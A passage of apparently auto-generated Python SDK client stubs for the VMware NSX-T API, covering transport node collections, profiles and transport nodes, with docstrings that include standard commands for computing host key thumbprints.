        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'traceflow_id': traceflow_id}
        return self._invoke('get', payload)

    def list(self,
             cursor=None,
             included_fields=None,
             lport_id=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        List all Traceflow rounds; if a logical port id is given as a query
        parameter, only those originated from the logical port are returned.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be
            included in query result (optional)
        :type  lport_id: :class:`str` or ``None``
        :param lport_id: id of the source logical port where the trace flows
            originated (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.TraceflowListResult`
        :return: com.vmware.nsx.model.TraceflowListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'cursor': cursor,
            'included_fields': included_fields,
            'lport_id': lport_id,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', payload)
class TransportNodeCollections(VapiInterface):
    """
    Operations on transport node collections, which attach transport node
    profiles to compute collections.
    """
    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.transport_node_collections'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _TransportNodeCollectionsStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, transport_node_collection):
        """
        When a transport node collection is created the hosts which are part
        of the compute collection will be prepared automatically, i.e. NSX
        Manager attempts to install the NSX components on hosts. Transport
        nodes for these hosts are created using the configuration specified
        in the transport node profile.

        :type  transport_node_collection: :class:`com.vmware.nsx.model_client.TransportNodeCollection`
        :param transport_node_collection: (required)
        :rtype: :class:`com.vmware.nsx.model_client.TransportNodeCollection`
        :return: com.vmware.nsx.model.TransportNodeCollection
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'transport_node_collection': transport_node_collection}
        return self._invoke('create', payload)

    def delete(self, transport_node_collection_id):
        """
        Deleting a transport node collection detaches the transport node
        profile (TNP) from the compute collection. It has no effect on
        existing transport nodes; however, new hosts added to the compute
        collection will no longer be automatically converted to NSX
        transport nodes. Detaching a TNP from a compute collection does not
        delete the TNP.

        :type  transport_node_collection_id: :class:`str`
        :param transport_node_collection_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'transport_node_collection_id': transport_node_collection_id}
        return self._invoke('delete', payload)

    def get(self, transport_node_collection_id):
        """
        Return a transport node collection by id.

        :type  transport_node_collection_id: :class:`str`
        :param transport_node_collection_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.TransportNodeCollection`
        :return: com.vmware.nsx.model.TransportNodeCollection
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'transport_node_collection_id': transport_node_collection_id}
        return self._invoke('get', payload)

    def list(self):
        """
        Return all transport node collections.

        :rtype: :class:`com.vmware.nsx.model_client.TransportNodeCollectionListResult`
        :return: com.vmware.nsx.model.TransportNodeCollectionListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        # This operation takes no parameters, so no payload is sent.
        return self._invoke('list', None)

    def update(self, transport_node_collection_id, transport_node_collection):
        """
        Attach a different transport node profile to a compute collection by
        updating the transport node collection.

        :type  transport_node_collection_id: :class:`str`
        :param transport_node_collection_id: (required)
        :type  transport_node_collection: :class:`com.vmware.nsx.model_client.TransportNodeCollection`
        :param transport_node_collection: (required)
        :rtype: :class:`com.vmware.nsx.model_client.TransportNodeCollection`
        :return: com.vmware.nsx.model.TransportNodeCollection
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'transport_node_collection_id': transport_node_collection_id,
            'transport_node_collection': transport_node_collection,
        }
        return self._invoke('update', payload)
class TransportNodeProfiles(VapiInterface):
    """
    Operations on transport node profiles, which capture the configuration
    needed to create transport nodes.
    """
    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.transport_node_profiles'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _TransportNodeProfilesStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, transport_node_profile):
        """
        A transport node profile captures the configuration needed to create
        a transport node. A transport node profile can be attached to
        compute collections for automatic TN creation of member hosts.

        :type  transport_node_profile: :class:`com.vmware.nsx.model_client.TransportNodeProfile`
        :param transport_node_profile: (required)
        :rtype: :class:`com.vmware.nsx.model_client.TransportNodeProfile`
        :return: com.vmware.nsx.model.TransportNodeProfile
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'transport_node_profile': transport_node_profile}
        return self._invoke('create', payload)

    def delete(self, transport_node_profile_id):
        """
        Delete the specified transport node profile. A transport node
        profile can be deleted only when it is not attached to any compute
        collection.

        :type  transport_node_profile_id: :class:`str`
        :param transport_node_profile_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'transport_node_profile_id': transport_node_profile_id}
        return self._invoke('delete', payload)

    def get(self, transport_node_profile_id):
        """
        Return information about a specified transport node profile.

        :type  transport_node_profile_id: :class:`str`
        :param transport_node_profile_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.TransportNodeProfile`
        :return: com.vmware.nsx.model.TransportNodeProfile
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'transport_node_profile_id': transport_node_profile_id}
        return self._invoke('get', payload)

    def list(self,
             cursor=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        Return information about all transport node profiles.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be
            included in query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.TransportNodeProfileListResult`
        :return: com.vmware.nsx.model.TransportNodeProfileListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', payload)

    def update(self,
               transport_node_profile_id,
               transport_node_profile,
               esx_mgmt_if_migration_dest=None,
               if_id=None,
               ping_ip=None,
               vnic=None,
               vnic_migration_dest=None,
               ):
        """
        When configurations of a transport node profile (TNP) are updated,
        all the transport nodes in all the compute collections to which this
        TNP is attached are updated to reflect the updated configuration.

        :type  transport_node_profile_id: :class:`str`
        :param transport_node_profile_id: (required)
        :type  transport_node_profile: :class:`com.vmware.nsx.model_client.TransportNodeProfile`
        :param transport_node_profile: (required)
        :type  esx_mgmt_if_migration_dest: :class:`str` or ``None``
        :param esx_mgmt_if_migration_dest: The network ids to which the ESX
            vmk interfaces will be migrated (optional)
        :type  if_id: :class:`str` or ``None``
        :param if_id: The ESX vmk interfaces to migrate (optional)
        :type  ping_ip: :class:`str` or ``None``
        :param ping_ip: IP Addresses to ping right after ESX vmk interfaces
            were migrated. (optional)
        :type  vnic: :class:`str` or ``None``
        :param vnic: The ESX vmk interfaces and/or VM NIC to migrate
            (optional)
        :type  vnic_migration_dest: :class:`str` or ``None``
        :param vnic_migration_dest: The migration destinations of ESX vmk
            interfaces and/or VM NIC (optional)
        :rtype: :class:`com.vmware.nsx.model_client.TransportNodeProfile`
        :return: com.vmware.nsx.model.TransportNodeProfile
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'transport_node_profile_id': transport_node_profile_id,
            'transport_node_profile': transport_node_profile,
            'esx_mgmt_if_migration_dest': esx_mgmt_if_migration_dest,
            'if_id': if_id,
            'ping_ip': ping_ip,
            'vnic': vnic,
            'vnic_migration_dest': vnic_migration_dest,
        }
        return self._invoke('update', payload)
class TransportNodes(VapiInterface):
    """
    Client-side stub for the ``com.vmware.nsx.transport_nodes`` service.
    Each public method delegates the call, with its named parameters, to
    the generated ``_TransportNodesStub`` via :func:`VapiInterface._invoke`.
    """
    # Allowed values for the ``action`` parameter of ``updatemaintenancemode``.
    UPDATEMAINTENANCEMODE_ACTION_ENTER_MAINTENANCE_MODE = "enter_maintenance_mode"
    """
    Possible value for ``action`` of method
    :func:`TransportNodes.updatemaintenancemode`.
    """
    UPDATEMAINTENANCEMODE_ACTION_FORCED_ENTER_MAINTENANCE_MODE = "forced_enter_maintenance_mode"
    """
    Possible value for ``action`` of method
    :func:`TransportNodes.updatemaintenancemode`.
    """
    UPDATEMAINTENANCEMODE_ACTION_EXIT_MAINTENANCE_MODE = "exit_maintenance_mode"
    """
    Possible value for ``action`` of method
    :func:`TransportNodes.updatemaintenancemode`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.transport_nodes'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _TransportNodesStub)
        # No operation-specific identifiers are registered for this service.
        self._VAPI_OPERATION_IDS = {}
    def create(self,
               transport_node,
               ):
        """
        Transport nodes are hypervisor hosts and NSX Edges that will
        participate in an NSX-T overlay. For a hypervisor host, this means that
        it hosts VMs that will communicate over NSX-T logical switches. For NSX
        Edges, this means that it will have logical router uplinks and
        downlinks. This API creates transport node for a host node (hypervisor)
        or edge node (router) in the transport network. When you run this
        command for a host, NSX Manager attempts to install the NSX kernel
        modules, which are packaged as VIB, RPM, or DEB files. For the
        installation to succeed, you must provide the host login credentials
        and the host thumbprint. To get the ESXi host thumbprint, SSH to the
        host and run the **openssl x509 -in /etc/vmware/ssl/rui.crt
        -fingerprint -sha256 -noout** command. To generate host key thumbprint
        using SHA-256 algorithm please follow the steps below. Log into the
        host, making sure that the connection is not vulnerable to a man in the
        middle attack. Check whether a public key already exists. Host public
        key is generally located at '/etc/ssh/ssh_host_rsa_key.pub'. If the key
        is not present then generate a new key by running the following command
        and follow the instructions. **ssh-keygen -t rsa** Now generate a
        SHA256 hash of the key using the following command. Please make sure to
        pass the appropriate file name if the public key is stored with a
        different file name other than the default 'id_rsa.pub'. **awk '{print
        $2}' id_rsa.pub | base64 -d | sha256sum -b | sed 's/ .\*$//' | xxd -r
        -p | base64** This api is deprecated as part of FN+TN unification.
        Please use Transport Node API to install NSX components on a node.
        Additional documentation on creating a transport node can be found in
        the NSX-T Installation Guide. In order for the transport node to
        forward packets, the host_switch_spec property must be specified. Host
        switches (called bridges in OVS on KVM hypervisors) are the individual
        switches within the host virtual switch. Virtual machines are connected
        to the host switches. When creating a transport node, you need to
        specify if the host switches are already manually preconfigured on the
        node, or if NSX should create and manage the host switches. You specify
        this choice by the type of host switches you pass in the
        host_switch_spec property of the TransportNode request payload. For a
        KVM host, you can preconfigure the host switch, or you can have NSX
        Manager perform the configuration. For an ESXi host or NSX Edge node,
        NSX Manager always configures the host switch. To preconfigure the host
        switches on a KVM host, pass an array of PreconfiguredHostSwitchSpec
        objects that describes those host switches. In the current NSX-T
        release, only one preconfigured host switch can be specified. See the
        PreconfiguredHostSwitchSpec schema definition for documentation on the
        properties that must be provided. Preconfigured host switches are only
        supported on KVM hosts, not on ESXi hosts or NSX Edge nodes. To allow
        NSX to manage the host switch configuration on KVM hosts, ESXi hosts,
        or NSX Edge nodes, pass an array of StandardHostSwitchSpec objects in
        the host_switch_spec property, and NSX will automatically create host
        switches with the properties you provide. In the current NSX-T release,
        up to 5 host switches can be automatically managed. See the
        StandardHostSwitchSpec schema definition for documentation on the
        properties that must be provided. Note: previous versions of NSX-T used
        a property named host_switches to specify the host switch configuration
        on the transport node. That property is deprecated, but still
        functions. You should configure new host switches using the
        host_switch_spec property. The request should either provide
        node_deployment_info or node_id. If the host node (hypervisor) or edge
        node (router) is already added in system then it can be converted to
        transport node by providing node_id in request. If host node
        (hypervisor) or edge node (router) is not already present in system
        then information should be provided under node_deployment_info.
        :type  transport_node: :class:`com.vmware.nsx.model_client.TransportNode`
        :param transport_node: (required)
        :rtype: :class:`com.vmware.nsx.model_client.TransportNode`
        :return: com.vmware.nsx.model.TransportNode
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('create',
                            {
                            'transport_node': transport_node,
                            })
    def delete(self,
               transport_node_id,
               force=None,
               unprepare_host=None,
               ):
        """
        Deletes the specified transport node. Query param force can be used to
        force delete the host nodes. Force deletion of edge and public cloud
        gateway nodes is not supported. It also removes the specified node
        (host or edge) from system. If unprepare_host option is set to false,
        then host will be deleted without uninstalling the NSX components from
        the host.
        :type  transport_node_id: :class:`str`
        :param transport_node_id: (required)
        :type  force: :class:`bool` or ``None``
        :param force: Force delete the resource even if it is being used somewhere
            (optional, default to false)
        :type  unprepare_host: :class:`bool` or ``None``
        :param unprepare_host: Uninstall NSX components from host while deleting (optional,
            default to true)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('delete',
                            {
                            'transport_node_id': transport_node_id,
                            'force': force,
                            'unprepare_host': unprepare_host,
                            })
    def deleteontransportnode(self,
                              target_node_id,
                              target_uri,
                              ):
        """
        Invoke DELETE request on target transport node
        :type  target_node_id: :class:`str`
        :param target_node_id: Target node UUID (required)
        :type  target_uri: :class:`str`
        :param target_uri: URI of API to invoke on target node (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
            Gateway Timeout
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('deleteontransportnode',
                            {
                            'target_node_id': target_node_id,
                            'target_uri': target_uri,
                            })
    def disableflowcache(self,
                         transport_node_id,
                         ):
        """
        Disable flow cache for edge transport node. Caution: This involves
        restart of the edge dataplane and hence may lead to network disruption.
        :type  transport_node_id: :class:`str`
        :param transport_node_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('disableflowcache',
                            {
                            'transport_node_id': transport_node_id,
                            })
    def enableflowcache(self,
                        transport_node_id,
                        ):
        """
        Enable flow cache for edge transport node. Caution: This involves
        restart of the edge dataplane and hence may lead to network disruption.
        :type  transport_node_id: :class:`str`
        :param transport_node_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('enableflowcache',
                            {
                            'transport_node_id': transport_node_id,
                            })
    def get(self,
            transport_node_id,
            ):
        """
        Returns information about a specified transport node.
        :type  transport_node_id: :class:`str`
        :param transport_node_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.TransportNode`
        :return: com.vmware.nsx.model.TransportNode
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get',
                            {
                            'transport_node_id': transport_node_id,
                            })
    def getontransportnode(self,
                           target_node_id,
                           target_uri,
                           ):
        """
        Invoke GET request on target transport node
        :type  target_node_id: :class:`str`
        :param target_node_id: Target node UUID (required)
        :type  target_uri: :class:`str`
        :param target_uri: URI of API to invoke on target node (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
            Gateway Timeout
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('getontransportnode',
                            {
                            'target_node_id': target_node_id,
                            'target_uri': target_uri,
                            })
    def list(self,
             cursor=None,
             in_maintenance_mode=None,
             included_fields=None,
             node_id=None,
             node_ip=None,
             node_types=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             transport_zone_id=None,
             ):
        """
        Returns information about all transport nodes along with underlying
        host or edge details. A transport node is a host or edge that contains
        hostswitches. A hostswitch can have virtual machines connected to them.
        Because each transport node has hostswitches, transport nodes can also
        have virtual tunnel endpoints, which means that they can be part of the
        overlay.
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type  in_maintenance_mode: :class:`bool` or ``None``
        :param in_maintenance_mode: maintenance mode flag (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type  node_id: :class:`str` or ``None``
        :param node_id: node identifier (optional)
        :type  node_ip: :class:`str` or ``None``
        :param node_ip: Fabric node IP address (optional)
        :type  node_types: :class:`str` or ``None``
        :param node_types: a list of fabric node types separated by comma or a single type
            (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :type  transport_zone_id: :class:`str` or ``None``
        :param transport_zone_id: Transport zone identifier (optional)
        :rtype: :class:`com.vmware.nsx.model_client.TransportNodeListResult`
        :return: com.vmware.nsx.model.TransportNodeListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('list',
                            {
                            'cursor': cursor,
                            'in_maintenance_mode': in_maintenance_mode,
                            'included_fields': included_fields,
                            'node_id': node_id,
                            'node_ip': node_ip,
                            'node_types': node_types,
                            'page_size': page_size,
                            'sort_ascending': sort_ascending,
                            'sort_by': sort_by,
                            'transport_zone_id': transport_zone_id,
                            })
    def postontransportnode(self,
                            target_node_id,
                            target_uri,
                            ):
        """
        Invoke POST request on target transport node
        :type  target_node_id: :class:`str`
        :param target_node_id: Target node UUID (required)
        :type  target_uri: :class:`str`
        :param target_uri: URI of API to invoke on target node (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
            Gateway Timeout
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('postontransportnode',
                            {
                            'target_node_id': target_node_id,
                            'target_uri': target_uri,
                            })
    def putontransportnode(self,
                           target_node_id,
                           target_uri,
                           ):
        """
        Invoke PUT request on target transport node
        :type  target_node_id: :class:`str`
        :param target_node_id: Target node UUID (required)
        :type  target_uri: :class:`str`
        :param target_uri: URI of API to invoke on target node (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.TimedOut`
            Gateway Timeout
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('putontransportnode',
                            {
                            'target_node_id': target_node_id,
                            'target_uri': target_uri,
                            })
    def refreshnodeconfiguration(self,
                                 transport_node_id,
                                 ):
        """
        The API is applicable for Edge transport nodes. If you update the VM
        configuration and find a discrepancy in VM configuration at NSX
        Manager, then use this API to refresh configuration at NSX Manager. It
        refreshes the VM configuration from sources external to MP. Sources
        include vSphere Server and the edge node. After this action, the API
        GET api/v1/transport-nodes will show refreshed data.
        :type  transport_node_id: :class:`str`
        :param transport_node_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('refreshnodeconfiguration',
                            {
                            'transport_node_id': transport_node_id,
                            })
    def restartinventorysync(self,
                             transport_node_id,
                             ):
        """
        Restart the inventory sync for the node if it is currently internally
        paused. After this action the next inventory sync coming from the node
        is processed.
        :type  transport_node_id: :class:`str`
        :param transport_node_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('restartinventorysync',
                            {
                            'transport_node_id': transport_node_id,
                            })
    def restoreclusterconfig(self,
                             transport_node_id,
                             ):
        """
        A host can be overridden to have different configuration than Transport
        Node Profile(TNP) on cluster. This action will restore such overridden
        host back to cluster level TNP. This API can be used in other case.
        When TNP is applied to a cluster, if any validation fails (e.g. VMs
        running on host) then existing transport node (TN) is not updated. In
        that case after the issue is resolved manually (e.g. VMs powered off),
        you can call this API to update TN as per cluster level TNP.
        :type  transport_node_id: :class:`str`
        :param transport_node_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('restoreclusterconfig',
                            {
                            'transport_node_id': transport_node_id,
                            })
    def resynchostconfig(self,
                         transportnode_id,
                         ):
        """
        Resync the TransportNode configuration on a host. It is similar to
        updating the TransportNode with existing configuration, but force syncs
        these configurations to the host (no backend optimizations).
        :type  transportnode_id: :class:`str`
        :param transportnode_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
